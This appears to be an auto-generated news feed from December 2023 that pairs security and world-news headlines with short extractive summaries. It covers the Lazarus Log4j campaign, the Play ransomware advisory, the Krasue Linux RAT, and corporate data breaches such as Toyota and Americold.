            2023-12-11 https://thehackernews.com/2023/12/lazarus-group-using-log4j-exploits-to.html
            The notorious North Korea-linked threat actor known as the Lazarus Group has been attributed to a new global campaign that involves the opportunistic exploitation of security flaws in Log4j to deploy previously undocumented remote access trojans (RATs) on compromised hosts. Cisco Talos is tracking the activity under the name Operation Blacksmith, noting the use of three DLang-based "

            Autosummary: Kimsuky, also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima, is an element operating under North Korea's Reconnaissance General Bureau (RGB), which also houses the Lazarus Group. "


            Maceió: Salt mine ruptures in Brazil causing fear of collapse

            latam
            2023-12-11 https://www.bbc.co.uk/news/world-latin-america-67681120?at_medium=RSS&at_campaign=KARANGA
            Tens of thousands of residents have already been evacuated from the area over the past five years. "

            Autosummary: "


            Cold storage giant Americold discloses data breach after April malware attack

            financial exploits
            2023-12-11 https://www.bleepingcomputer.com/news/security/cold-storage-giant-americold-discloses-data-breach-after-april-malware-attack/
            Cold storage and logistics giant Americold has confirmed that over 129,000 employees and their dependents had their personal information stolen in an April attack, later claimed by Cactus ransomware. [...] "

            Autosummary: Personal information stolen by the attackers includes a combination of name, address, Social Security number, driver's license/state ID number, passport number, financial account information (such as bank account and credit card numbers), and employment-related health insurance and medical information for each affected individual. "


            Toyota warns customers of data breach exposing personal, financial info

            financial
            2023-12-11 https://www.bleepingcomputer.com/news/security/toyota-warns-customers-of-data-breach-exposing-personal-financial-info/
            Toyota Financial Services (TFS) is warning customers it suffered a data breach, stating that sensitive personal and financial data was exposed in the attack. [...] "

            Autosummary: "


            Lazarus hackers drop new RAT malware using 2-year-old Log4j bug

            exploits
            2023-12-11 https://www.bleepingcomputer.com/news/security/lazarus-hackers-drop-new-rat-malware-using-2-year-old-log4j-bug/
            The notorious North Korean hacking group known as Lazarus continues to exploit CVE-2021-44228, aka "Log4Shell," this time to deploy three previously unseen malware families written in DLang. [...] "

            Autosummary: The attacker's server replies with the victim's external IP address and one of the following commands for local execution by the malware:
            deleteme – Delete the malware from the system using a BAT file
            download – Download files from a specified remote location
            rename – Rename files on the infected system
            iamsleep – Instruct the malware to enter a dormant state for a set period
            upload – Upload files to the C2 server
            showurls – Not implemented yet
            Finally, Cisco's analysts discovered BottomLoader, a malware downloader that fetches and executes payloads from a hardcoded URL using PowerShell while also establishing persistence for them by modifying the Startup directory. DLRAT's first activity on a device is to execute hard-coded commands to collect preliminary system information like OS details, network MAC address, etc., and send it to the C2 server. "


            Counter-Strike 2 HTML injection bug exposes players’ IP addresses

            exploits
            2023-12-11 https://www.bleepingcomputer.com/news/security/counter-strike-2-html-injection-bug-exposes-players-ip-addresses/
            Valve has reportedly fixed an HTML injection flaw in Counter-Strike 2 that was heavily abused today to inject images into games and obtain other players' IP addresses. [...] "

            Autosummary: "


            Apple emergency updates fix recent zero-days on older iPhones

            exploits
            2023-12-11 https://www.bleepingcomputer.com/news/apple/apple-emergency-updates-fix-recent-zero-days-on-older-iphones/
            Apple has issued emergency security updates to backport patches for two actively exploited zero-day flaws to older iPhones and some Apple Watch and Apple TV models. [...] "

            Autosummary: "


            50K WordPress sites exposed to RCE attacks by critical bug in backup plugin

            exploits
            2023-12-11 https://www.bleepingcomputer.com/news/security/50k-wordpress-sites-exposed-to-rce-attacks-by-critical-bug-in-backup-plugin/
            A critical severity vulnerability in a WordPress plugin with more than 90,000 installs can let attackers gain remote code execution to fully compromise vulnerable websites. [...] "

            Autosummary: [Image: Backup Migration vulnerable code (Wordfence)]
            Patch released within hours
            Wordfence reported the critical security flaw to BackupBliss, the development team behind the Backup Migration plugin, on December 6, with the developers releasing a patch hours later. "


            Toyota Financial Services discloses a data breach

            financial
            2023-12-11 https://securityaffairs.com/155652/data-breach/toyota-financial-services-data-breach.html
            Toyota Financial Services (TFS) disclosed a data breach: threat actors had access to sensitive personal and financial data. Toyota Financial Services (TFS) is warning customers it has suffered a data breach that exposed sensitive personal and financial data. “Due to an attack on the systems, unauthorized persons gained access to personal data. Affected customers have now […] "

            Autosummary: Toyota Financial Services discloses a data breach. Pierluigi Paganini, December 11, 2023. Toyota Financial Services (TFS) disclosed a data breach: threat actors had access to sensitive personal and financial data. "


            #StopRansomware: Play Ransomware

            exploits ransomware
            2023-12-11 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-352a

            SUMMARY

            Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

            The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD's ACSC) are releasing this joint CSA to disseminate the Play ransomware group’s IOCs and TTPs identified through FBI investigations as recently as October 2023.

            Since June 2022, the Play (also known as Playcrypt) ransomware group has impacted a wide range of businesses and critical infrastructure in North America, South America, and Europe. As of October 2023, the FBI was aware of approximately 300 affected entities allegedly exploited by the ransomware actors.

            In Australia, the first Play ransomware incident was observed in April 2023, and most recently in November 2023.

            The Play ransomware group is presumed to be a closed group, designed to “guarantee the secrecy of deals,” according to a statement on the group’s data leak website. Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data. Ransom notes do not include an initial ransom demand or payment instructions, rather, victims are instructed to contact the threat actors via email.

            The FBI, CISA, and ASD’s ACSC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. T "

            Autosummary: Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.

            REPORTING
            The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Play ransomware actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

            In some instances, cybersecurity researchers have observed Play ransomware actors using PowerShell scripts to target Microsoft Defender.[2]

            Lateral Movement and Execution
            Play ransomware actors use command and control (C2) applications, including Cobalt Strike and SystemBC, and tools like PsExec, to assist with lateral movement and file execution.

            Discovery and Defense Evasion
            Play ransomware actors use tools like AdFind to run Active Directory queries [TA0007] and Grixba [1], an information-stealer, to enumerate network information [T1016] and scan for anti-virus software [T1518.001].

            Initial Access
            The Play ransomware group gains initial access to victim networks through the abuse of valid accounts [T1078] and exploitation of public-facing applications [T1190], specifically through known FortiOS (CVE-2018-13379 and CVE-2020-12812) and Microsoft Exchange (ProxyNotShell [CVE-2022-41040 and CVE-2022-41082]) vulnerabilities.

            The FBI, CISA, and ASD’s ACSC recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems), thus strengthening the security posture for their customers.

            VALIDATE SECURITY CONTROLS
            In addition to applying mitigations, the FBI, CISA, and ASD’s ACSC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. "


            Coral reef: How divers are using antibiotics to save sick corals

            industry
            2023-12-10 https://www.bbc.co.uk/news/world-latin-america-67647402?at_medium=RSS&at_campaign=KARANGA
            Turks and Caicos Islanders are helping protect the reef from the deadliest ever coral sickness. "

            Autosummary: "


            Week in review: Booking.com hotel booking scam, Kali Linux 2023.4 released

            financial Linux
            2023-12-10 https://www.helpnetsecurity.com/2023/12/10/week-in-review-booking-com-hotel-booking-scam-kali-linux-2023-4-released/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Advanced ransomware campaigns expose need for AI-powered cyber defense In this Help Net Security interview, Carl Froggett, CIO at Deep Instinct, discusses emerging trends in ransomware attacks, emphasizing the need for businesses to use advanced AI technologies, such as deep learning (DL), for prevention rather than just detection and response. SessionProbe: Open-source multi-threaded pentesting tool SessionProbe is a multi-threaded pentesting … More

            The post Week in review: Booking.com hotel booking scam, Kali Linux 2023.4 released appeared first on Help Net Security.

            "

            Autosummary: Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Advanced ransomware campaigns expose need for AI-powered cyber defense In this Help Net Security interview, Carl Froggett, CIO at Deep Instinct, discusses emerging trends in ransomware attacks, emphasizing the need for businesses to use advanced AI technologies, such as deep learning (DL), for prevention rather than just detection and response. New infosec products of the week: December 8, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Atsign, Daon, Global Integrity, Living Security, Panther Labs, Searchlight Cyber, and Varonis. "


            Researcher discovered a new lock screen bypass bug for Android 14 and 13

            exploits
            2023-12-10 https://securityaffairs.com/155588/hacking/android-14-13-lock-screen-bypass.html
            Researchers discovered a lock screen bypass bug in Android 14 and 13 that could expose sensitive data in users’ Google accounts. The security researcher Jose Rodriguez (@VBarraquito) discovered a new lock screen bypass vulnerability for Android 14 and 13. A threat actor with physical access to a device can access photos, contacts, browsing history and more. […] "

            Autosummary: "


            A crisis at the Mexico border felt in Ukraine

            latam
            2023-12-09 https://www.bbc.co.uk/news/world-us-canada-67663844?at_medium=RSS&at_campaign=KARANGA
            Migrants from as far afield as China, Cameroon and Afghanistan walk into a US political quagmire. "

            Autosummary: "


            Researchers Unveil GuLoader Malware's Latest Anti-Analysis Techniques

            exploits
            2023-12-09 https://thehackernews.com/2023/12/researchers-unveal-guloader-malwares.html
            Threat hunters have unmasked the latest tricks adopted by a malware strain called GuLoader in an effort to make analysis more challenging. "While GuLoader's core functionality hasn't changed drastically over the past few years, these constant updates in their obfuscation techniques make analyzing GuLoader a time-consuming and resource-intensive process," Elastic Security Labs "

            Autosummary: "The threat actor has been actively monitoring threat reports to perform quick changes thus evading detections," security researchers Ernesto Fernández Provecho, Pham Duy Phuc, Ciana Driscoll, and Vinoo Thomas said. "


            Norton Healthcare disclosed a data breach after a ransomware attack

            financial exploits ransomware
            2023-12-09 https://securityaffairs.com/155495/data-breach/norton-healthcare-ransomware-attack.html
            Kentucky health system Norton Healthcare disclosed a data breach after it was a victim of a ransomware attack in May. Norton Healthcare disclosed a data breach after a ransomware attack that hit the organization on May 9, 2023. The security breach exposed personal information belonging to patients, employees, and dependents. The health system notified federal […] "

            Autosummary: The compromised information varied for each person and could have included: name, contact information, Social Security Number, date of birth, health information, insurance information, and medical identification numbers. "


            SLAM Attack: New Spectre-based Vulnerability Impacts Intel, AMD, and Arm CPUs

            exploits
            2023-12-09 https://thehackernews.com/2023/12/slam-attack-new-spectre-based.html
            Researchers from the Vrije Universiteit Amsterdam have disclosed a new side-channel attack called SLAM that could be exploited to leak sensitive information from kernel memory on current and upcoming CPUs from Intel, AMD, and Arm. The attack is an end-to-end exploit for Spectre based on a new feature in Intel CPUs called Linear Address Masking (LAM) as well as its analogous "

            Autosummary: It impacts the following CPUs:
            - Existing AMD CPUs vulnerable to CVE-2020-12965
            - Future Intel CPUs supporting LAM (both 4- and 5-level paging)
            - Future AMD CPUs supporting UAI and 5-level paging
            - Future Arm CPUs supporting TBI and 5-level paging
            "Arm systems already mitigate against Spectre v2 and BHB, and it is considered the software's responsibility to protect itself against Spectre v1," Arm said in an advisory. "


            Russia-linked APT8 exploited Outlook zero-day to target European NATO members

            exploits
            2023-12-08 https://securityaffairs.com/155420/apt/apt8-exploited-outlook-0day-target-nato.html
            Russia-linked group APT28 exploited Microsoft Outlook zero-day to target European NATO members, including a NATO Rapid Deployable Corps. Palo Alto Networks’ Unit 42 reported that the Russia-linked APT28 (aka “Forest Blizzard”, “Fancybear” or “Strontium”) group exploited the CVE-2023-23397 vulnerability in attacks aimed at European NATO members. Over the past 20 months, the group targeted at […] "

            Autosummary: According to other partners, over this period, the MOA also exploited other vulnerabilities, such as the one affecting Microsoft Windows Support Diagnostic Tool (MSDT, CVE-2022-30190, also called Follina) as well as those targeting the Roundcube application (CVE-2020-12641, CVE-2020-35730, CVE-2021-44026). "


            WordPress Releases Update 6.4.2 to Address Critical Remote Attack Vulnerability

            exploits
            2023-12-08 https://thehackernews.com/2023/12/wordpress-releases-update-642-to.html
            WordPress has released version 6.4.2 with a patch for a critical security flaw that could be exploited by threat actors by combining it with another bug to execute arbitrary PHP code on vulnerable sites. "A remote code execution vulnerability that is not directly exploitable in core; however, the security team feels that there is a potential for high severity when combined with some plugins, "

            Autosummary: "


            Founder of Bitzlato Cryptocurrency Exchange Pleads Guilty in Money-Laundering Scheme

            financial
            2023-12-08 https://thehackernews.com/2023/12/founder-of-bitzlato-cryptocurrency.html
            The Russian founder of the now-defunct Bitzlato cryptocurrency exchange has pleaded guilty, nearly 11 months after he was arrested in Miami earlier this year. Anatoly Legkodymov (aka Anatolii Legkodymov, Gandalf, and Tolik), according to the U.S. Justice Department, admitted to operating an unlicensed money-transmitting business that enabled other criminal actors to launder their "

            Autosummary: "Legkodymov's guilty plea today confirms that he was well aware that Bitzlato, his cryptocurrency exchange, was being used like an open turnstile by criminals eager to take advantage of his lax controls over illicit money transactions," said U.S. Attorney Breon Peace for the Eastern District of New York. "


            New RCE vulnerability in Apache Struts 2 fixed, upgrade ASAP (CVE-2023-50164)

            exploits
            2023-12-08 https://www.helpnetsecurity.com/2023/12/08/cve-2023-50164/

            The Apache Struts project has released updates for the popular open-source web application framework, with fixes for a critical vulnerability that could lead to remote code execution (CVE-2023-50164). About CVE-2023-50164 CVE-2023-50164 may allow an attacker to manipulate file upload parameters to enable path traversal. Under some circumstances this may allow the attacker to upload a malicious file that can be used to perform remote code execution. No additional details are available at this time. The … More

            The post New RCE vulnerability in Apache Struts 2 fixed, upgrade ASAP (CVE-2023-50164) appeared first on Help Net Security.

            "

            Autosummary: "


            Ransomware-as-a-Service: The Growing Threat You Can't Ignore

            exploits
            2023-12-08 https://thehackernews.com/2023/12/ransomware-as-service-growing-threat.html
            Ransomware attacks have become a significant and pervasive threat in the ever-evolving realm of cybersecurity. Among the various iterations of ransomware, one trend that has gained prominence is Ransomware-as-a-Service (RaaS). This alarming development has transformed the cybercrime landscape, enabling individuals with limited technical expertise to carry out devastating attacks. "

            Autosummary: Customers, commonly referred to as "affiliates," have various payment options, including flat fees, subscriptions, or a percentage of the revenue.
            The bottom line
            Ransomware attacks have grown increasingly sophisticated, resulting in more powerful, targeted, and agile threats. "


            Mac Users Beware: New Trojan-Proxy Malware Spreading via Pirated Software

            exploits
            2023-12-08 https://thehackernews.com/2023/12/mac-users-beware-new-trojan-proxy.html
            Unauthorized websites distributing trojanized versions of cracked software have been found to infect Apple macOS users with a new Trojan-Proxy malware. "Attackers can use this type of malware to gain money by building a proxy server network or to perform criminal acts on behalf of the victim: to launch attacks on websites, companies and individuals, buy guns, drugs, and other illicit "

            Autosummary: "Attackers can use this type of malware to gain money by building a proxy server network or to perform criminal acts on behalf of the victim: to launch attacks on websites, companies and individuals, buy guns, drugs, and other illicit goods," Kaspersky security researcher Sergey Puzan said. "


            Founder of Bitzlato exchange has pleaded guilty to unlicensed money transmitting

            financial
            2023-12-08 https://securityaffairs.com/155455/cyber-crime/founder-bitzlato-money-laundering-scheme.html
            Anatoly Legkodymov, the founder of the Bitzlato cryptocurrency exchange, has pleaded guilty in a money-laundering scheme. Anatoly Legkodymov (41) (aka Anatolii Legkodymov, Gandalf, and Tolik), the Russian founder of the unlicensed Bitzlato cryptocurrency exchange, has pleaded guilty in a money-laundering scheme. The police arrested Legkodymov in Miami in January; he was charged in a U.S. federal […] "

            Autosummary: “In connection with his plea agreement, Anatoly Legkodymov, aka Anatolii Legkodymov, Gandalf, and Tolik, 41, who is a Russian national and resided in Shenzen, People’s Republic of China, agreed to dissolve Bitzlato and to release any claim over approximately $23 million in seized assets of Bitzlato.” "


            Privilege elevation exploits used in over 50% of insider attacks

            exploits
            2023-12-08 https://www.bleepingcomputer.com/news/security/privilege-elevation-exploits-used-in-over-50-percent-of-insider-attacks/
            Elevation of privilege flaws are the most common vulnerability leveraged by corporate insiders when conducting unauthorized activities on networks, whether for malicious purposes or by downloading risky tools in a dangerous manner. [...] "

            Autosummary: Even if a system has been patched for these flaws, insiders can gain elevated privileges through other means, such as DLL hijacking flaws in apps running with elevated privileges, insecure file system permissions or service configurations, or Bring Your Own Vulnerable Driver (BYOVD) attacks.
            A typical insider attack
            CrowdStrike explains that utilizing privilege escalation vulnerabilities to gain administrative privileges is critical to many insider attacks, as in most cases, rogue insiders start with low-level access to their network environments. However, in these cases, though they are not used to attack the company, they are commonly utilized in a risky manner, potentially introducing threats or malware to the network that threat actors could abuse. In both scenarios, installing the fake exploit on a workstation would allow initial access to a corporate network, which could lead to cyber espionage, data theft, or ransomware attacks. "


            UK and US expose Russian hacking plot intended to influence UK’s 2019 elections and spread disinformation

            rusia-ucrania
            2023-12-08 https://www.bitdefender.com/blog/hotforsecurity/uk-and-us-expose-russian-hacking-plot-intended-to-influence-uks-2019-elections-and-spread-disinformation/
            Two men have been charged with hacking into computer networks in the United States, UK, other NATO countries, and Ukraine, on behalf of the Russian government. Read more in my article on the Hot for Security blog. "

            Autosummary: The men are said to be members of the Callisto Group (also known as Star Blizzard, SEABORGIUM, TA446, COLDRIVER, TAG-53, and BlueCharlie). Two men have been charged with hacking into computer networks in the United States, UK, other NATO countries, and Ukraine, on behalf of the Russian government. "


            ALPHV ransomware site outage rumored to be caused by law enforcement

            exploits ransomware
            2023-12-08 https://www.bleepingcomputer.com/news/security/alphv-ransomware-site-outage-rumored-to-be-caused-by-law-enforcement/
            A law enforcement operation is rumored to be behind an outage affecting ALPHV ransomware gang's websites over the last 30 hours. [...] "

            Autosummary: [Image: Admin showing "Repair" as their Tox status. Source: BleepingComputer]
            However, BleepingComputer suspects that the ransomware gang may have suffered potential law enforcement action after their recent activities, which was also hinted at by others. "


            Norton Healthcare discloses data breach after May ransomware attack

            financial exploits ransomware
            2023-12-08 https://www.bleepingcomputer.com/news/security/norton-healthcare-discloses-data-breach-after-may-ransomware-attack/
            Kentucky health system Norton Healthcare has confirmed that a ransomware attack in May exposed personal information belonging to patients, employees, and dependents. [...] "

            Autosummary: The attackers gained access to a wide range of sensitive information, including name, contact information, Social Security Number, date of birth, health information, insurance information, and medical identification numbers. "


            Alberto Fujimori: Peru's ex-president freed after 15 years in jail

            latam
            2023-12-07 https://www.bbc.co.uk/news/world-latin-america-67645016?at_medium=RSS&at_campaign=KARANGA
            Alberto Fujimori, Peru's divisive former leader, is pardoned over corruption and human rights violations. "

            Autosummary: "


            Mexico's missing students: Families to search "until the last beat of my heart"

            latam
            2023-12-07 https://www.bbc.co.uk/news/world-latin-america-67639725?at_medium=RSS&at_campaign=KARANGA
            Nearly 10 years after 43 students disappeared, families say they will look "until the last beat" of their hearts. "

            Autosummary: "


            ChatGPT builder helps create scam and hack campaigns

            financial
            2023-12-07 https://www.bbc.co.uk/news/technology-67614065?at_medium=RSS&at_campaign=KARANGA
A cutting-edge tool from Open AI appears to be poorly moderated, allowing it to be abused by cyber-criminals.


            Ransomware in 2024: Anticipated impact, targets, and landscape shift

            exploits
            2023-12-07 https://www.helpnetsecurity.com/2023/12/07/2024-ransomware-groups-impact/

            As ransomware continues to be on the rise, we can expect groups to continue to evolve their attacks and operate at a larger scale for bigger profits. This will put organizations at higher risk if they don’t adopt a more aggressive security strategy. Here is what we can expect the ransomware landscape to look like in 2024. In 2024, we’ll see more mass exploitations of vulnerabilities As a result of the pandemic, organizations moved many … More


Autosummary: As a result, attack surfaces — most prominently in manufacturing, healthcare, and education — doubled and tripled in size, which appealed to ransomware groups.


            Third-party breaches shake the foundations of the energy sector

            industry
            2023-12-07 https://www.helpnetsecurity.com/2023/12/07/energy-industry-third-party-breaches/

            90% of the world’s largest energy companies experienced a third-party breach in the past 12 months, according to SecurityScorecard. Powering the global economy and everyday activities, the energy sector’s significance makes it a key focus for cyber threats. The urgency to protect this critical sector grows amid economic and political uncertainties. Cyberattacks on energy don’t just cause financial losses and disruptions; they also impact manufacturing, healthcare, and transportation. Third-party breaches in the energy industry 100% … More


Autosummary: Successful management of third-party cyber risks relies on achieving three essential outcomes: efficient use of resources; effective risk management and resilience; and impact on business decision-making. “Hope and prayer may be useful but are clearly not sustainable strategies.”


            Brazil deploys troops to Venezuela border

            latam
            2023-12-07 https://www.bbc.co.uk/news/world-latin-america-67645018?at_medium=RSS&at_campaign=KARANGA
Soldiers are deploying, days after Venezuela announces plans to take over part of Guyana.


            See me talking about “Future-proofing enterprise cybersecurity for AI, vulnerabilities, and business risks”

            ciber
            2023-12-07 https://grahamcluley.com/webinar-future-proofing-enterprise-cybersecurity-for-ai-vulnerabilities-and-business-risks/
Using real-life examples of organisations who have been hacked, I'll be discussing with experts from Skybox Security the importance of adopting a resilient strategy for dealing with vulnerabilities inside your organisation.


            New Stealthy "Krasue" Linux Trojan Targeting Telecom Firms in Thailand

            exploits Telcos Linux
            2023-12-07 https://thehackernews.com/2023/12/new-stealthy-krasue-linux-trojan.html
A previously unknown Linux remote access trojan called Krasue has been observed targeting telecom companies in Thailand by threat actors to maintain covert access to victim networks since at least 2021. Named after a nocturnal female spirit of Southeast Asian folklore, the malware is "able to conceal its own presence during the initialization phase," Group-IB said in a report


            Climate change: How is my country doing on tackling it?

            government
            2023-12-07 https://www.bbc.co.uk/news/science-environment-65754296?at_medium=RSS&at_campaign=KARANGA
Find out how the world's major economies are doing on cutting their emissions and what lies ahead.


            Smashing Security podcast #351: Nuclear cybersecurity, Marketplace scams, and face up to porn

            financial ciber
            2023-12-07 https://grahamcluley.com/smashing-security-podcast-351/
Hacking fears are raised at Western Europe's most hazardous building, why porn sites might soon be scanning your face, and our guest narrowly avoids a Facebook Marketplace scammer. All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by Dinah Davis.

Autosummary: Hosts: Graham Cluley (@gcluley), Carole Theriault (@caroletheriault). Guest: Dinah Davis (@dinah_davis). Sponsored by Push Security – Monitor and secure your entire identity attack surface, including non-SSO identities.


            Malwarebytes unveils vulnerability assessment module to help users identify critical vulnerabilities

            exploits
            2023-12-07 https://www.helpnetsecurity.com/2023/12/07/malwarebytes-vulnerability-assessment-module/

            Malwarebytes announced its comprehensive vulnerability assessment module is now included in every ThreatDown bundle at no additional cost via its integrated console. Many IT organizations are struggling with rising cybersecurity costs associated with annual vendor price increases and the necessity of adding more tools to protect against an ever-increasing attack surface. Malwarebytes, with its portfolio of award-winning ThreatDown solutions, is taking a different approach, helping customers reduce threats, security complexity and costs by providing a … More


Autosummary: “Many IT organizations are using disparate security products that are complex, expensive and don’t easily integrate, leaving them both overwhelmed and exposed to critical vulnerabilities,” said Marcin Kleczynski, CEO, Malwarebytes.


            New Bluetooth Flaw Let Hackers Take Over Android, Linux, macOS, and iOS Devices

            Linux
            2023-12-07 https://thehackernews.com/2023/12/new-bluetooth-flaw-let-hackers-take.html
A critical Bluetooth security flaw could be exploited by threat actors to take control of Android, Linux, macOS and iOS devices. Tracked as CVE-2023-45866, the issue relates to a case of authentication bypass that enables attackers to connect to susceptible devices and inject keystrokes to achieve code execution as the victim. "Multiple Bluetooth stacks have authentication bypass


            Hacking the Human Mind: Exploiting Vulnerabilities in the "First Line of Cyber Defense"

            exploits
            2023-12-07 https://thehackernews.com/2023/12/hacking-human-mind-exploiting.html
Humans are complex beings with consciousness, emotions, and the capacity to act based on thoughts. In the ever-evolving realm of cybersecurity, humans consistently remain primary targets for attackers. Over the years, these attackers have developed their expertise in exploiting various human qualities, sharpening their skills to manipulate biases and emotional triggers with the objective of

Autosummary: Exploitation techniques, often seen in digital channels like email, phone calls, or text messages, are frequently used for phishing. These tactics manipulate established interactions to achieve various objectives, such as deceiving individuals into parting with funds, opening malicious files, submitting credentials, or revealing sensitive data. Defending ourselves: to safeguard against these attacks on our minds, we should align our cognitive standards with emotional triggers by asking questions such as: what is the purpose, expectation, and legitimacy of the interaction? As humans, our minds set us apart, marked by a multitude of traits and emotions, often too complicated to articulate precisely.


            Governments May Spy on You by Requesting Push Notifications from Apple and Google

            government
            2023-12-07 https://thehackernews.com/2023/12/governments-may-spy-on-you-by.html
Unspecified governments have demanded mobile push notification records from Apple and Google users to pursue people of interest, according to U.S. Senator Ron Wyden. "Push notifications are alerts sent by phone apps to users' smartphones," Wyden said. "These alerts pass through a digital post office run by the phone operating system provider -- overwhelmingly Apple or Google. Because of

Autosummary: "The data these two companies receive includes metadata, detailing which app received a notification and when, as well as the phone and associated Apple or Google account to which that notification was intended to be delivered," the letter read.


            New Krasue Linux RAT targets telecom companies in Thailand

            Telcos Linux
            2023-12-07 https://securityaffairs.com/155361/malware/krasue-rootkit-targets-thailand.html
A previously undetected Linux RAT dubbed Krasue has been observed targeting telecom companies in Thailand. Group-IB researchers discovered a previously undetected Linux remote access trojan called Krasue has been employed in attacks aimed at telecom companies in Thailand. The Krasue Remote Access Trojan (RAT) has remained undetected since at least 2021 when it was registered on […]

Autosummary: Threat actors could propagate the threat by exploiting vulnerabilities in Internet-facing systems, conducting credential brute force attacks, and tricking victims into downloading deceptive packages or binaries (i.e., files masquerading as product updates) from untrustworthy third-party sources.


            Russian pleads guilty to running crypto-exchange used by ransomware gangs

            exploits ransomware rusia-ucrania
            2023-12-07 https://www.bleepingcomputer.com/news/security/russian-pleads-guilty-to-running-crypto-exchange-used-by-ransomware-gangs/
Russian national Anatoly Legkodymov pleaded guilty to operating the Bitzlato cryptocurrency exchange that helped ransomware gangs and other cybercriminals launder over $700 million. [...]

Autosummary: As a Bitzlato co-founder and principal stakeholder, Legkodymov (also known as "Gandalf" and "Tolik") has agreed to disband the cryptocurrency exchange and relinquish any rights to approximately $23 million in seized assets, as outlined in the plea agreement.


            UK and allies expose Russian FSB hacking group, sanction members

            rusia-ucrania
            2023-12-07 https://www.bleepingcomputer.com/news/security/uk-and-allies-expose-russian-fsb-hacking-group-sanction-members/
The UK National Cyber Security Centre (NCSC) and Microsoft warn that the Russian state-backed actor "Callisto Group" (aka "Seaborgium" or "Star Blizzard") is targeting organizations worldwide with spear-phishing campaigns used to steal account credentials and data. [...]

Autosummary: Callisto's latest tactics: In a bulletin published today, the UK's NCSC says Callisto remains focused on launching spear-phishing attacks targeting the country's governmental organizations, think tanks, politicians, defense-industrial units, and various NGOs. In addition, the UK says the group is behind credential and data theft attacks against parliamentarians from multiple political parties, universities, journalists, the public sector, non-government organizations, and other civil society organizations.


            Krasue RAT malware hides on Linux servers using embedded rootkits

            exploits Linux
            2023-12-07 https://www.bleepingcomputer.com/news/security/krasue-rat-malware-hides-on-linux-servers-using-embedded-rootkits/
Security researchers discovered a remote access trojan they named Krasue that is targeting Linux systems of telecommunications companies and managed to remain undetected since 2021. [...]

Autosummary: When communicating with the command and control (C2) server, Krasue can accept the following commands: `ping` – reply with `pong`; `master` – set the master upstream C2; `info` – get information about the malware: main pid, child pid, and its status such as “root: gained root permissions,” “god: process is unable to be killed,” “hidden: process is hidden,” “module: rootkit is loaded”; `restart` – restart child process; `respawn` – restart main process; `god die` – kill itself. Group-IB discovered nine distinct C2 IP addresses hardcoded into the malware, with one using port 554, which is common in RTSP (Real Time Streaming Protocol) connections.


            BlackSuit ransomware – what you need to know

            exploits ransomware
            2023-12-07 https://www.tripwire.com/state-of-security/blacksuit-ransomware-what-you-need-know
A cybercriminal group calling itself BlackSuit has claimed responsibility for a series of ransomware attacks, including breaches at schools in central Georgia. And earlier in the year, a zoo in Tampa Bay was targeted by the same hacking gang. Learn more about the BlackSuit ransomware in my article on the Tripwire State of Security blog.

Autosummary: Even if they have a secure, unencrypted backup of their important data to rebuild their systems from, they will still have to handle the possible fall-out when sensitive information about their business, their employees, their suppliers, and their customers is released into the public domain by the criminals. Meanwhile, liberal arts college DePauw University in Indiana says that it was recently targeted, and a "limited amount of data on specific individuals was accessed."


Microsoft Warns of COLDRIVER's Evolving Evading and Credential-Stealing Tactics

            industry
            2023-12-07 https://thehackernews.com/2023/12/microsoft-warns-of-coldrivers-evolving.html
The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interest to Russia while simultaneously improving its detection evasion capabilities. The Microsoft Threat Intelligence team tracks the cluster as Star Blizzard (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53),

Autosummary: The adversary "continues to prolifically target individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests," Redmond said.


            23andMe updates user agreement to prevent data breach lawsuits

            financial
            2023-12-07 https://www.bleepingcomputer.com/news/security/23andme-updates-user-agreement-to-prevent-data-breach-lawsuits/
As genetic testing provider 23andMe faces multiple lawsuits for an October credential stuffing attack that led to the theft of customer data, the company has modified its Terms of Use to make it harder to sue the company. [...]


            US government is snooping on people via phone push notifications, says senator

            government
            2023-12-07 https://www.malwarebytes.com/blog/news/2023/12/us-government-is-snooping-on-people-via-phone-push-notifications-says-senator
Government agencies have been asking Apple and Google for metadata related to push notifications, but the companies aren't allowed to tell users about it.

Autosummary: The type of information varies from app to app, but in certain cases, it might also contain unencrypted content, which could range from backend directives for the app to the actual text displayed to a user in a notification.


            Russian military hackers target NATO fast reaction corps

            rusia-ucrania
            2023-12-07 https://www.bleepingcomputer.com/news/security/russian-military-hackers-target-nato-fast-reaction-corps/
Russian APT28 military hackers used Microsoft Outlook zero-day exploits to target multiple European NATO member countries, including a NATO Rapid Deployable Corps. [...]

Autosummary: Additionally, beyond European Defense, Foreign Affairs, and Internal Affairs agencies, APT28's focus extended to critical infrastructure organizations involved in energy production and distribution, pipeline infrastructure operations, and material handling, personnel, and air transportation.


            Qualcomm Releases Details on Chip Vulnerabilities Exploited in Targeted Attacks

            exploits
            2023-12-06 https://thehackernews.com/2023/12/qualcomm-releases-details-on-chip.html
